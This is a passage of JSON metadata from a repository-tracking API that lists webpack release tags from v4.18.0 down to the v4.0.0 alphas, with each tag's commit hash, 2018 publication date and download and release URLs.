5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","s